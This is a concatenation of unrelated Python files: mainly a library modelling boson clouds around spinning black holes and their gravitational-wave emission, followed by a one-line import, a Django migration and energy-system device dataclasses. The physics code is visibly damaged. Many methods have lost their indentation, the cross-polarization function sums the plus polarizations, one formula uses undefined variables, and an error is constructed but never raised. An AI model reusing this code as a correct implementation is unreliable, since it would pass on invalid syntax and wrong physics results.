        """ Boson rest energy in eV. """
        return self.m_b * C_SI**2 / EV_SI
    @cached_property
    def fgw(self):
        """ GW frequency implied by the boson energy: E/(hbar*pi) = 2E/h. """
        return self.m_b_ev * EV_SI / (HBAR_SI*np.pi)
    @staticmethod
    def compute(m_bh, m_b):
        """ alpha = G*M*m/(hbar*c), with both masses in SI units. """
        return G_SI * m_bh * m_b / (HBAR_SI * C_SI)
class BlackHoleBoson(object):
    def __init__(self, bh, boson):
        """ System composed of a black hole and a boson.
        To create from parameters use the `.from_parameters()` class method.
        Arguments
        ---------
        bh: BlackHole
            black-hole instance.
        boson: Boson
            boson instance.
        """
        self.bh = bh
        self.boson = boson
        # fine-structure constant `G M m / (hbar c) = rg / lambda_bar_c`
        self.alpha = bh.rg / boson.reduced_compton_wavelength
        # cache of BosonCloud objects keyed by (l, m, nr)
        self.clouds = {}
        self._has_waveform = False
# --------------------------------------------------------------------
# CLASS METHODS
@classmethod
def from_parameters(cls, **kwargs):
""" Create black-hole boson system from parameters.
Can pass any two of the mass parameters (m_bh, m_b, alpha) and
any one of the BH spin parameters (chi_bh, a_bh, j_bh).
The BH mass is assumed to be in units of MSUN, unless `msun=False` in
which case SI units are expected.
The boson mass is assumed to be in units of eV, unless `ev=False` in
which case SI units are expected.
The spin parameters (a_bh, j_bh) are always expected in SI units, while
`chi_bh` is dimensionless.
Arguments
---------
m_bh: float
black-hole mass (in MSUN, or SI if `msun` is False).
chi_bh: float
dimensionless BH spin.
m_b: float
boson rest mass (eV, or SI if `ev` is False).
boson_spin: int
spin of boson field (0 for scalar, 1 for vector).
alpha: float
fine-structure constant.
msun: bool
BH mass provided in solar masses, rather than SI (def True).
ev: bool
boson mass provided in eV, rather than SI (def True).
"""
s_b = kwargs.pop('boson_spin', 0)
bh_spin_kwargs = {k.strip('_bh'): kwargs.pop(k, None) for k in
['chi_bh', 'a_bh', 'j_bh']}
alpha = Alpha(**kwargs)
bh = BlackHole(alpha.m_bh, msun=False, **bh_spin_kwargs)
boson = Boson(alpha.m_b, spin=s_b, ev=False)
return cls(bh, boson)
# --------------------------------------------------------------------
# UTILITIES
def _sr_factor(self, m):
""" Super-radiance term for magnetic quantum number `m`.
Super-radiance takes place if this value is non-negative.
Arguments
---------
m: int
magnetic quantum number.
Returns
-------
sr_factor: float
m * Omega_bh - omega_boson (dimensionless)
"""
sr_factor_natural = m*self.bh.chi - 2*self.alpha*self.bh.rp_natural
# Note `sr_factor_natural` is dimensionless because:
# sr_factor_natural = (2 rp / c)*sr_factor
# with `sr_factor` the dimensionful factor (rad/s):
# sr_factor = m*self.bh.omega_horizon - self.boson.omega
return sr_factor_natural
    def is_superradiant(self, m):
        """ True if magnetic number `m` satisfies the super-radiance condition. """
        return self._sr_factor(m) >= 0
# --------------------------------------------------------------------
# FREQUENCY
    def _level(self, n):
        # hydrogenic correction factor for principal quantum number `n`
        return hydrogenic_level(n, self.alpha)
def level_energy(self, n, units='ev'):
''' Return real part of hydrogenic energy eigenvalues.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
'''
units = units.lower()
if units == 'ev':
mu = self.boson.energy_ev
elif units == 'si':
mu = self.boson.energy
elif units == 'none':
mu = 1
return mu * self._level(n)
    def level_omega_natural(self, n):
        ''' Return dimensionless hydrogenic eigen-frequencies.
        Arguments
        ---------
        n: float
            *principal* quantum number `n = nr + l + 1`, for `nr` the radial
            and `l` the azimuthal quantum numbers.
        Returns
        -------
        omega_dimless: float
            dimensionless angular frequency of the nth eigenmode
            (`alpha` times the dimensionless level energy).
        '''
        return self.alpha * self.level_energy(n, units='none')
def level_omega_re(self, n, method='hydrogen'):
''' Return real part of energy eigen-frequencies in rad/s.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
omega: float
angular frequency of nth eigenmode in rad/s.
'''
if method=='hydrogen':
w = self.boson.omega * self._level(n)
elif method=='numeric':
NotImplementedError("numeric frequency solutuions unavailable.")
else:
raise ValueError("unrecognized method %r." % method)
return w
def level_frequency(self, n, *args, **kwargs):
''' Return real part of hydrogenic energy eigen-frequencies in Hz.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
frequency: float
frequency of n-th eigenmode in Hz.
'''
return self.level_omega_re(n, *args, **kwargs) / (2*np.pi)
# --------------------------------------------------------------------
# GROWTH-RATE
def _clmn(self, l, m, nr):
""" Factor in computation of imaginary frequency.
gamma factor of Eq. (28) in Detweiler (1980), or equivalently
Clmn factor of Eq. (18) in Arvanitaki & Dubovsky (2011).
Without the spin correction, this gives a prefactor of 1/24.
for the (1, 1, 0) scalar state.
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
clmn: float
gamma/cnlm factor.
"""
chi = self.bh.chi
sr_factor = self._sr_factor(m)
# Factor 1
f1 = factorial(2*l + nr + 1) * 2**(4*l + 2)
f1 /= factorial(nr) * (nr + l + 1)**(2*l + 4)
# Factor 2
f2 = (factorial(l) / (factorial(2*l)*factorial(2*l + 1)))**2
# Factor 3
js = np.arange(1, l+1)
factors = js**2 * (1 - chi**2) + sr_factor**2
# i.e. \[ j^2 (1-a^2/rg^2) + 4 rp^2 (m wp - mu)^2 \],
# with Arvanitaki+'s defns: `wp = omega_bh_natural / rg`, `alpha=mu rg`
f3 = np.product(factors)
return f1*f2*f3
def level_omega_im(self, l, m, nr, method='detweiler'):
''' Return imag part of hydrogenic energy eigen-frequencies in rad/s.
Importantly, this *half* of the occupancy number grow rate.
Can be computed in different regimes:
'detweiler'
This is from an analytic approximation in the nonrelativistic limit
`alpha << 1`. References:
Eq. (28) in Detweiler (1980)
Eq. (18) in Arvanitaki & Dubovsky (2011)
Eq. (8) in Brito et al. (2017)
'zouros'
This is from an analytic approximation in the WKB regime
`alpha >> 1`. References:
Zouros & Eardley (1979)
Eq. (27) in Arvanitaki & Dubovsky (2011)
'dolan'
Numerical method for the intermediate regime `alpha ~ 1`.
Dolan (2007)
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
omega: float
angular frequency of nth eigenmode in rad/s.
'''
method = method.lower()
n = nr + l + 1
w0 = self.boson.omega
a = self.alpha
if method == 'detweiler':
# this agrees with Eq. (8) in arXiv:1706.06311
# sr = 2 rp^2 (m Obh - w) / c
sr = self._sr_factor(m)
# multiply by 0.5 to get field-amplitude growth
# that way, here clmn = 1/48. for (1, 1, 0)
clmn = 0.5*self._clmn(l, m, nr)
omega_im = w0 * a**(4*l +4) * sr * clmn
elif method == 'zouros':
number = 2. - np.sqrt(2)
omega_im = 1E-7 * (C_SI/self.bh.rg) * np.exp(-2*np.pi*a*number)
elif method == 'dolan':
raise NotImplementedError("method 'dolan' not implented yet.")
else:
e = "unrecognized method %r (valid options are: 'detweiler')"\
% method
raise ValueError(e)
return omega_im
def fgw(self, n):
''' Returns main gravitational-wave frequency for level `n`.
fgw = 2*fre = 2*(wre/2pi) = wre/pi
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
fgw: float
GW frequency in Hz.
'''
return self.level_omega_re(n) / np.pi
def max_growth_rate(self, l_min=0, nr_min=0, l_max=5, nr_max=5, **kwargs):
""" Search for level with fastest superradiant growth rate.
Arguments
---------
l_min: int
minimum azimuthal quantum number (def. 0).
nr_min: int
minimum radial quantum number (def. 0).
l_max: int
maximum azimuthal quantum number (def. 5).
nr_max: int
maximum radial quantum number (def. 5).
Returns
-------
l_best: int
azimuthal quantum number of fastest-growing level.
m_best: int
magnetic quantum number of fastest-growing level.
nr_best: int
radial quantum number of fastest-growing level.
rate_best: float
growth rate (Hz) of fastest-growing level.
"""
# Given the way the SR rate scales with `l`, we want the smallest `l`,
# with highest `m` that satisfies SR condition.
# TODO: is this true for vectors?
if self.alpha > 0.5:
# cannot satisfy SR condition
return 0, 0, 0, 0
else:
# TODO: this can be optimized
ls, ms, nrs, rates = [], [], [], []
for l in range(l_min, l_max+1):
for m in range(0, l+1):
for nr in range(nr_min, nr_max+1):
rate = self.level_omega_im(l, m, nr, **kwargs)
ls.append(l)
ms.append(m)
nrs.append(nr)
rates.append(rate)
i = rates.index(max(rates))
return ls[i], ms[i], nrs[i], rates[i]
# --------------------------------------------------------------------
# CLOUDS
    def _add_cloud(self, l, m, nr):
        # create and register a BosonCloud for this system under (l, m, nr)
        cloud = BosonCloud(self, l, m, nr)
        self.clouds[(int(l), int(m), int(nr))] = cloud
def best_cloud(self, *args, **kwargs):
""" Retrieve (or create) cloud with fastest SR growth-rate.
All arguments passed to growth-rate function.
Returns
-------
cloud: Cloud
cloud object for given quantum numbers.
"""
l, m, nr, _ = self.max_growth_rate(*args, **kwargs)
key = (int(l), int(m), int(nr))
if key not in self.clouds:
self._add_cloud(*key)
return self.clouds[key]
def cloud(self, l, m, nr, update_waveform=True):
""" Retrieve (or create) cloud of given level.
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
cloud: Cloud
cloud object for given quantum numbers.
"""
key = (int(l), int(m), int(nr))
if key not in self.clouds:
self._add_cloud(*key)
if self._has_waveform and update_waveform:
self.waveform = self.create_waveform()
return self.clouds[key]
# --------------------------------------------------------------------
# GWS
def create_waveform(self, lmns=None, lgw_max=None):
""" Produce waveform (hp, hc) by adding contributions from clouds with
quantum numners `lmns`, up to GW azimuthal number `lgw_max`.
If no `lmns` are specified, will use all clouds present to produce waform.
If no `lgw_max` is specified, will only use the minimum (`l_gw=2*l_cloud`)
for each cloud.
Arguments
---------
lmns: list
optional list of tuples with cloud quantum numbers,
e.g. [(1,1,0), (2,1,2), ...] (def. all precomputed clouds).
lgw_max: int
maximum GW azimuthal number (2*l_cloud <= l_gw <= lgw_max).
Returns
-------
hp: function
plus polarization (function of theta, phi and time)
hc: function
cross polarization (function of theta, phi and time)
"""
if lmns is None:
lmns = self.clouds.keys()
hps, hcs = [], []
# loop over cloud lmn's
for lmn in lmns:
c = self.cloud(*lmn)
# loop over GW l's if specified, otherwise just set `l_gw=2*l_c`
lgw_max_loc = lgw_max or 2*c.l
for lgw in np.arange(2*c.l, lgw_max_loc+1):
hps.append(c.gw(lgw).hp)
hcs.append(c.gw(lgw).hc)
if len(hps) == 0:
raise ValueError("no matching clouds to produce waveform!")
def hp(*args, **kwargs):
return np.sum([hp(*args, **kwargs) for hp in hps])
def hc(*args, **kwargs):
return np.sum([hp(*args, **kwargs) for hp in hps])
return hp, hc
    @cached_property
    def waveform(self):
        # lazily-built (hp, hc) pair; `cloud()` overwrites this cached
        # value whenever a new cloud is added after the first access
        wf = self.create_waveform()
        self._has_waveform = True
        return wf
    def hp(self, *args, **kwargs):
        """ Plus polarization of the total waveform, scaled by distance
        `r` in meters (keyword, def. 1). """
        r = kwargs.pop('r', 1)
        return self.waveform[0](*args, **kwargs) / r
    def hc(self, *args, **kwargs):
        """ Cross polarization of the total waveform, scaled by distance
        `r` in meters (keyword, def. 1). """
        r = kwargs.pop('r', 1)
        return self.waveform[1](*args, **kwargs) / r
class BosonCloud(object):
    def __init__(self, bhb, l, m, nr, evolve=True, evolve_params=None, from_final=False):
        """ Boson cloud around a black hole, corresponding to a single level.
        Arguments
        ---------
        bhb: BlackHoleBoson
            black-hole-boson object
        l: int
            azimuthal quantum number.
        m: int
            magnetic quantum number.
        nr: int
            radial quantum number.
        evolve: bool
            whether to compute final BH mass and spin numerically or approximate.
        evolve_params: dict
            optional keyword arguments for the evolution (def. {'y_0': 1E-8}).
        from_final: bool
            interpret `bhb` as the post-SR, rather than pre, black-hole-boson
            system.
        Raises
        ------
        ValueError
            if `bhb` is not BlackHoleBoson-like, or if the quantum numbers
            are inconsistent.
        """
        # duck-type check that `bhb` looks like a BlackHoleBoson
        try:
            bhb.boson.reduced_compton_wavelength
            bhb.bh.rg
        except AttributeError:
            # BUGFIX: the message previously formatted `type(boson)`, an
            # undefined name, so a NameError masked the intended ValueError
            raise ValueError("'bhb' must be `BlackHoleBoson` instance, not %r"
                             % type(bhb))
        if from_final:
            self._bh_initial = None
            self._bhb_initial = None
            self._bhb_final = bhb
            self._bh_final = bhb.bh
        else:
            self._bhb_initial = bhb
            self._bh_initial = bhb.bh
            self._bh_final = None
            self._bhb_final = None
        # check consistency of quantum numbers
        if (0 <= l) & (np.abs(m) <= l) & (0 <= nr) & isinstance(nr*l*m, int):
            self.n = nr + l + 1  # principal quantum number
            self.nr = nr
            self.l = l
            self.m = m
        else:
            raise ValueError("invalid quantum numbers (l, m, nr) = (%r, %r, %r)"
                             % (l, m, nr))
        # set cloud properties
        self.age = 0  # actual age of the cloud after evolving
        self._growth_time = None
        self._life_time = None  # characteristic duration of the cloud
        self._is_superradiant = None
        self._mass = None
        self._mass_msun = None
        # set gravitational-wave properties
        self._zabs = {}
        self._gws = {}
        self._fgw = None
        # solve DEs for cloud evolution, or approximate final values
        self.evolve = evolve
        self._evolve_params = evolve_params or {'y_0': 1E-8}
# --------------------------------------------------------------------
# CLASS METHODS
    @classmethod
    def from_parameters(cls, l, m, nr, evolve=True, evolve_params=None,
                        from_final=False, **kwargs):
        """ Build a cloud directly from BH/boson parameters; extra kwargs
        are forwarded to `BlackHoleBoson.from_parameters`. """
        bhb = BlackHoleBoson.from_parameters(**kwargs)
        return cls(bhb, l, m, nr, evolve=evolve, evolve_params=evolve_params,
                   from_final=from_final)
    # TODO: optimize
    def _backtrack_instability(self, **kwargs):
        """ Find the pre-SR BH parameters that evolve into `bhb_final`.
        Minimizes the (fractional-mass, spin) mismatch between the evolved
        final state and the stored final state over the initial guesses.
        NOTE(review): this returns the raw scipy `OptimizeResult`, while
        `bhb_initial` unpacks the call as a 2-tuple -- confirm which
        contract is intended.
        """
        # get guesses for initial BH parameters if provided
        m_i_0 = kwargs.pop('m_i_0', 1.11*self.bhb_final.bh.mass)
        m_i_frac_0 = m_i_0 / self.bhb_final.bh.mass
        chi_i_0 = kwargs.pop('chi_i_0', 1.)
        initial_guess = np.array([m_i_frac_0, chi_i_0])
        def evolve(mfrac_chi):
            # objective: distance between evolved and target final states
            m_i_frac, chi_i = mfrac_chi
            bh_i = BlackHole(m_i_frac*self.bhb_final.bh.mass, chi=chi_i)
            bhb_i = BlackHoleBoson(bh_i, self.bhb_final.boson)
            cloud = BosonCloud(bhb_i, self.l, self.m, self.nr, **kwargs)
            m_f = cloud.bhb_final.bh.mass
            chi_f = cloud.bhb_final.bh.chi
            dm_frac = (m_f - self.bhb_final.bh.mass)/self.bhb_final.bh.mass
            dchi = chi_f - self.bhb_final.bh.chi
            return np.sqrt(dm_frac**2 + dchi**2)
        from scipy.optimize import minimize
        res = minimize(evolve, initial_guess, method='L-BFGS-B',
                       bounds=[(1., 1.4), (self.bhb_final.bh.chi, 0.99999)])
        return res
    def _evolve_instability(self, y_0=1E-8, dtau=None, max_steps=1E6, tolerance=1e-3,
                            dtau_adapt_frac=0.1, dtau_adapt_thresh=0.05,
                            m_accretion_rate=0, j_accretion_rate=0, bhb_0=None):
        """ Solve cloud evolution equations, ignoring cloud angular momentum and GW power.
        See documentation for `evolve_bhb` for more information.
        Arguments
        ---------
        y_0: float
            initial dimensionless cloud-energy seed (def. 1E-8).
        dtau: float
            time step; defaults to `amplitude_growth_time/1000`.
        max_steps: float
            maximum number of integration steps (def. 1E6).
        tolerance: float
            fractional change of the SR condition below which the loop
            terminates (def. 1e-3).
        dtau_adapt_frac: float
            fractional change applied to `dtau` when adapting (def. 0.1).
        dtau_adapt_thresh: float
            fractional-decrease threshold triggering adaptation (def. 0.05).
        m_accretion_rate, j_accretion_rate: float
            mass and angular-momentum accretion rates (def. 0).
        bhb_0: BlackHoleBoson
            initial system (def. `self.bhb_initial`).
        Returns
        -------
        bhb_new: BlackHoleBoson
            final black-hole-boson system.
        cs: tuple
            arrays (xs, jxs, ys, inv_wRs, wIs, sr_conds, times).
        """
        bhb_0 = bhb_0 or self.bhb_initial
        l = self.l
        m = self.m
        nr = self.nr
        # initial mass
        M0 = bhb_0.bh.mass
        T0 = G_SI*M0/C_SI**3
        # time step
        epsilon = 1./bhb_0.boson.omega
        dtau = dtau or self.amplitude_growth_time/1000.
        # other dimensionfull constants
        alpha = M0
        beta = epsilon*M0*C_SI**2
        gamma = M0*C_SI**2 / epsilon
        # initial state
        x_0 = 1
        jx_0 = bhb_0.bh.angular_momentum / beta # same as alpha_0/2
        n = l + nr + 1
        wR_0 = bhb_0.level_omega_re(n) * epsilon
        wI_0 = bhb_0.level_omega_im(l, m, nr) * epsilon
        # dimensionless accretion rates
        dimless_m_accretion_rate = m_accretion_rate * C_SI**2 / gamma
        dimless_j_accretion_rate = j_accretion_rate * epsilon / beta
        # initialize arrays
        xs = [x_0]
        ys = [y_0]
        jxs = [jx_0]
        inv_wRs = [1./wR_0]
        wIs = [wI_0]
        sr_conds = [get_sr_cond(x_0, jx_0, T0, epsilon, m=m)]
        times = [0]
        if not bhb_0.is_superradiant(m):
            # print "WARNING: initial BHB not superradiant for m = %i (alpha=%.6f)" \
            #     % (m, bhb_0.alpha)
            bhb_new = bhb_0
        else:
            # evolve
            for i in range(int(max_steps)):
                # update x & j
                dx = - 2*wIs[i]*ys[i]*dtau
                x_new = xs[i] + dx + dimless_m_accretion_rate*dtau
                y_new = ys[i] - dx
                # update jx & jy
                jx_new = jxs[i] - 2*m*wIs[i]*inv_wRs[i]*ys[i]*dtau +\
                         dimless_j_accretion_rate*dtau
                # update w's
                # TODO: optimize this to not rely on BH and BHB objects
                bh = BlackHole(x_new*alpha, j=jx_new*beta)
                bhb_new = BlackHoleBoson(bh, bhb_0.boson)
                inv_wR_new = 1./ (bhb_new.level_omega_re(n) * epsilon)
                wI_new = bhb_new.level_omega_im(l, m, nr) * epsilon
                # append
                xs.append(x_new)
                ys.append(y_new)
                jxs.append(jx_new)
                inv_wRs.append(inv_wR_new)
                wIs.append(wI_new)
                times.append(times[i] + dtau)
                # compute SR condition
                sr_cond = get_sr_cond(x_new, jx_new, T0, epsilon, m=m)
                sr_conds.append(sr_cond)
                # decide whether to terminate
                frac_decrease = (sr_conds[i] - sr_cond)/float(sr_cond)
                change_ratio = float(sr_cond)# / sr_conds[0]
                # NOTE(review): the two adapt branches do not handle
                # `frac_decrease == dtau_adapt_thresh`; confirm intended
                if frac_decrease < tolerance and (change_ratio < tolerance):
                    break
                elif frac_decrease < dtau_adapt_thresh:
                    # adapt time step
                    dtau *= 1. + dtau_adapt_frac
                elif frac_decrease > dtau_adapt_thresh:
                    # adapt time step
                    dtau *= 1. - dtau_adapt_frac
        # NOTE(review): `l` is rebound by this comprehension, shadowing the
        # azimuthal number (harmless here since `l` is no longer needed)
        cs = tuple([np.array(l) for l in [xs, jxs, ys, inv_wRs, wIs, sr_conds, times]])
        return bhb_new, cs
# --------------------------------------------------------------------
# PROPERTIES
@property
def is_superradiant(self):
""" Indicates whether this energy level (l, m, n) is superradiant.
"""
if self._is_superradiant is None:
self._is_superradiant = self.bhb_initial.is_superradiant(self.m)
return self._is_superradiant
@property
def amplitude_growth_time(self):
""" Field amplitude superradiant-instability timescale: `1/Im(omega)`.
"""
if self._growth_time is None:
self._growth_time = 1./self.bhb_initial.level_omega_im(self.l, self.m,
self.nr)
return self._growth_time
    @property
    def number_growth_time(self):
        """ Occupation number superradiant-instability timescale: `0.5/Im(omega)`.
        """
        # NOTE(review): the docstring advertises 0.5/Im(omega) but the code
        # returns 2x the amplitude timescale (= 2/Im(omega_amplitude));
        # one of the two conventions looks inverted -- confirm intent
        return 2.*self.amplitude_growth_time
@property
def bh_initial(self):
""" Black-hole before start of superradiant cloud growth.
"""
if self._bh_initial is None:
if self.evolve:
self._bh_initial = self.bhb_initial.bh
else:
# initial BH angular momentum from Eq. (25) in Brito et al.
# approximating the final alpha with the initial alpha
rg = self.bh_final.rg
w = self.bhb_final.level_omega_re(self.n)
chi_f = self.bhb_final.bh.chi
m_i = (2*(C_SI*rg*w + np.sqrt((C_SI*rg*w)**2 -
(chif*C_SI*rg*w)**2)))/\
(chif*C_SI**2)
# initial BH spin from Eq. (26) in Brito et al.
w_nat = self.bhb_final.level_omega_natural(self.n)
chi_i = (m_i + chi_f*m_i*w_nat - m_f) / (m_i*w_nat)
self._bh_initial = BlackHole(m_i, chi_i)
return self._bh_initial
    @property
    def bhb_initial(self):
        """ Black-hole-boson before start of superradiant cloud growth.
        """
        if self._bhb_initial is None:
            if self.evolve:
                # NOTE(review): `_backtrack_instability` returns a scipy
                # `OptimizeResult`, not a 2-tuple -- this unpacking looks
                # inconsistent with that signature; confirm
                self._bhb_initial, _ = self._backtrack_instability(evolve_params=self._evolve_params)
                # note that the value of y_0 does not affect final state,
                # but a higher value means fewer steps
            else:
                self._bhb_initial = BlackHoleBoson(self.bh_initial,
                                                   self.bhb_final.boson)
        return self._bhb_initial
@property
def bh_final(self):
""" Black-hole left at the end of superradiant cloud growth.
"""
if self._bh_final is None:
if self.evolve:
self._bh_final = self.bhb_final.bh
else:
# final BH angular momentum from Eq. (25) in Brito et al.
# approximating the final alpha with the initial alpha
rg = self.bh_initial.rg
w = self.bhb_initial.level_omega_re(self.n)
chi_f = 4*C_SI*self.m*rg*w / ((C_SI*self.m)**2 + 4*(rg*w)**2)
# final BH mass from Eq. (26) in Brito et al.
w_nat = self.bhb_initial.level_omega_natural(self.n)
m_f = self.bh_initial.mass*(1 - w_nat*(self.bh_initial.chi - chi_f))
self._bh_final = BlackHole(m_f, chi_f)
return self._bh_final
@property
def bhb_final(self):
""" Black-hole-boson left at the end of superradiant cloud growth.
"""
if self._bhb_final is None:
if self.evolve:
self._bhb_final, _ = self._evolve_instability(**self._evolve_params)
# note that the value of y_0 does not affect final state,
# but a higher value means fewer steps
else:
self._bhb_final = BlackHoleBoson(self.bh_final,
self.bhb_initial.boson)
return self._bhb_final
@property
def mass(self):
""" Maximum cloud mass (kg), reached at end of superradiant stage.
"""
if self._mass is None:
self._mass = self.bh_initial.mass - self.bh_final.mass
self._mass_msun = self._mass / MSUN_SI
return self._mass
    @property
    def mass_msun(self):
        """ Maximum cloud mass (MSUN), reached at end of superradiant stage.
        """
        if self._mass_msun is None:
            # accessing `mass` populates `_mass_msun` as a side effect
            self.mass
        return self._mass_msun
# --------------------------------------------------------------------
# GW PROPERTIES
@property
def fgw(self):
""" Gravitational-wave frequency (Hz).
"""
if self._fgw is None:
self._fgw = 2.*self.bhb_final.level_frequency(self.n)
return self._fgw
    def zabs(self, lgw=None):
        # |Z| factor from the numerical fits, cached per lgw (def. 2*l);
        # the GW may have any l_gw >= 2*l_cloud, but only m_gw = 2*m_cloud
        lgw = lgw or 2*self.l
        if lgw not in self._zabs:
            self._zabs[lgw] = Zabs(lgw, 2*self.m)(self.bhb_final.alpha)
        return self._zabs[lgw]
def gw(self, lgw=None):
lgw = lgw or 2*self.l
if lgw not in self._gws:
if lgw < 2*self.l:
raise ValueError("Must have `l_gw >= 2*l_cloud = %i`."
% 2*self.l)
# intrinsic amplitude, 1m away from the source (`h0r = h0*r`).
wgw = 2*np.pi*self.fgw
m_bh = self.bh_final.mass
m_c = self.mass
h0r = (C_SI**4/G_SI) * 2.*self.zabs(lgw=lgw)*m_c / (wgw*m_bh)**2
# SWSH spin parameter: dimensionless (spin x omega_gw)
c = self.bh_final.chi * 2*np.pi*self.fgw * self.bh_final.tg
self._gws[lgw] = GravitationalWaveMode(self.fgw, c=c, l=lgw,
m=2*self.m, h0r=h0r)
return self._gws[lgw]
    def get_life_time(self, lgws=None):
        """ GW timescale, adding lgws listed in argument (def. all cached
        modes, falling back to just 2*l_cloud): cloud rest energy divided
        by the summed radiated power.
        """
        lgws = self._gws.keys() if lgws is None else lgws
        if len(lgws)==0:
            lgws = [2*self.l]
        powers = []
        for lgw in lgws:
            powers.append(self.gw(lgw=lgw).power)
        rest_energy = self.mass*C_SI**2
        tgw = rest_energy / sum(powers)
        return tgw
class Zabs(object):
    """ GW amplitude factor |Z| as a numerical fit in the fine-structure
    constant alpha, for a given GW (l, m). """
    # Numerical fits in alpha (`a`) provided by R. Brito
    # (set up as a dict to ease adding fits dynamically later).
    # NOTE: these fits assume `chi = chi_f`; could generalize to arbitrary spin
    _FITS = {
        (2, 2): lambda a: Z22fitvec(a) if isinstance(a, (list, tuple, np.ndarray)) else Z22fit(a),
        (3, 2): lambda a: 1.0956326467084279*a**10 - 6.937259458016552*a**12 + 28.671829466292383*a**14,
    }
    def __init__(self, l, m):
        self.l = int(l)
        self.m = int(m)
        self._alpha_fit = None
    @property
    def alpha_fit(self):
        """ Fit callable for (l, m); NotImplementedError if none exists. """
        if self._alpha_fit is not None:
            return self._alpha_fit
        try:
            self._alpha_fit = self._FITS[(self.l, self.m)]
        except KeyError:
            # TODO: add ability to produce fits dynamically here
            raise NotImplementedError("no exisiting fit for (%i, %i)" %
                                      (self.l, self.m))
        return self._alpha_fit
    def __call__(self, alpha):
        return self.alpha_fit(alpha)
    @staticmethod
    def fast_fit(a, lgw=2, mgw=2):
        """ Evaluate a fit directly from the class-level table. """
        return Zabs._FITS[lgw, mgw](a)
class GravitationalWaveMode(object):
    def __init__(self, f, l=2, m=2, h0r=1, r0=1, c=0):
        """ A single (l, m) gravitational wave.
        Arguments
        ---------
        f: float
            signal frequency
        l: int
            azimuthal number (def. 2)
        m: int
            magnetic number (def. 2)
        c: float
            dimensionless spheroidal-harmonics parameter `c=a*omega` (def. 0).
        h0r: float
            intrinsic amplitude at fiducial distance, `h0r = h0(r0)` (def. 1).
        r0: float
            reference distance `r0` in meters (def. 1).
        """
        self.c = c
        self.l = l
        self.m = m
        self.f = f
        # angular frequency (rad/s)
        self.omega = 2*np.pi*self.f
        self.h0r = h0r
        self.r0 = r0
        # total radiated power in this mode (ATTENTION: +/- m both included)
        self.power = C_SI**3*(self.omega * self.h0r)**2 / (8.*np.pi*G_SI)
        # lazy caches for the SWSH pair and the (hp, hc) closures
        self._swsh = None
        self._polarizations = None
    @property
    def swshs(self):
        """ Pair of spin-weight -2 spheroidal harmonics for (l, m), (l, -m). """
        if self._swsh is None:
            c = self.c
            l = self.l
            m = self.m
            s = -2 # spin-weight of GWs
            self._swsh = (leavers.SpinWeightedSpheroidalHarmonic(c, l, m, s),
                          leavers.SpinWeightedSpheroidalHarmonic(c, l, -m, s))
        return self._swsh
@property
def polarizations(self):
if self._polarizations is None:
wgw = self.omega
m = self.m
swsh_p, swsh_m = self.swshs
def hp(theta, phi, t):
return np.cos(wgw*t + m*phi)*(swsh_p(theta, phi) +
swsh_m(theta, phi)).real
def hc(theta, phi, t):
return np.sin(wgw*t + m*phi)*(swsh_p(theta, phi)-
swsh_m(theta, phi)).real
self._polarizations = (hp, hc)
return self._polarizations
def hp(self, *args, **kwargs):
""" Plus polarization (unit amplitude).
Arguments
---------
theta: float
inclination angle
phi: float
orbital phase (azimuthal angle)
t: float, array
times.
r: float
distance from source in meters (def. 1).
Returns
-------
hp: array
plus polarization waveform for given times.
"""
r = kwargs.pop('r', self.r0)
return (self.r0 / r)*self.polarizations[0](*args, **kwargs)
def hc(self, *args, **kwargs):
""" Cross polarization (unit amplitude).
Arguments
---------
theta: float
inclination angle
phi: float
orbital phase (azimuthal angle)
t: float, array
times.
r: float
distance from source in meters (def. 1).
Returns
-------
hp: array
cross polarization waveform for given times.
"""
r = kwargs.pop('r', self.r0)
return (self.r0 / r)*self.polarizations[1](*args, **kwargs)
|
from nicos.devices.tango import BaseImageChannel as ImageChannel
|
# Generated by Django 3.1.1 on 2020-09-19 20:32
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the `status` field from the `order` model."""
    dependencies = [
        ('drinks', '0009_order_status'),
    ]
    operations = [
        # reversing re-adds the field from the state recorded
        # in 0009_order_status
        migrations.RemoveField(
            model_name='order',
            name='status',
        ),
    ]
|
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from oogeso import dto
# Device types defined as part of "basic":
# DevicePowerSourceData
# DeviceSink_elData
# DeviceStorage_elData
@dataclass
class DeviceSourceElData(dto.DeviceData):
    co2em: Optional[float] = None
    op_cost: Optional[float] = None
    reserve_factor: float = 1  # unused capacity contributes fully to spinning reserve
@dataclass
class DeviceSourceGasData(dto.DeviceData):
    # Optional[...] replaces the misleading `float = None` annotation
    naturalpressure: Optional[float] = None
@dataclass
class DeviceSourceWaterData(dto.DeviceData):
    naturalpressure: Optional[float] = None
@dataclass
class DeviceSinkElData(dto.DeviceData):
    pass
@dataclass
class DeviceSinkHeatData(dto.DeviceData):
    pass
@dataclass
class DeviceSinkGasData(dto.DeviceData):
    # NOTE: the annotation used to be `field(default_factory=lambda: {})`,
    # which is a dataclasses Field object, not a type; the default stays None
    price: Optional[dict] = None
@dataclass
class DeviceSinkOilData(dto.DeviceData):
    price: Optional[dict] = None
@dataclass
class DeviceSinkWaterData(dto.DeviceData):
    price: Optional[dict] = None
    flow_avg: Optional[float] = None  # required average flow
    max_accumulated_deviation: Optional[float] = None  # buffer size (max accumulated deviation from average)
@dataclass
class DeviceCompressorElData(dto.DeviceData):
    eta: Optional[float] = None  # efficiency
    Q0: Optional[float] = None  # nominal flow rate used in linearisation
    temp_in: Optional[float] = None  # inlet temperature
@dataclass
class DeviceCompressorGasData(dto.DeviceData):
    eta: Optional[float] = None  # efficiency
    Q0: Optional[float] = None  # nominal flow rate used in linearisation
    temp_in: Optional[float] = None  # inlet temperature
@dataclass
class DeviceElectrolyserData(dto.DeviceData):
    eta: Optional[float] = None  # efficiency
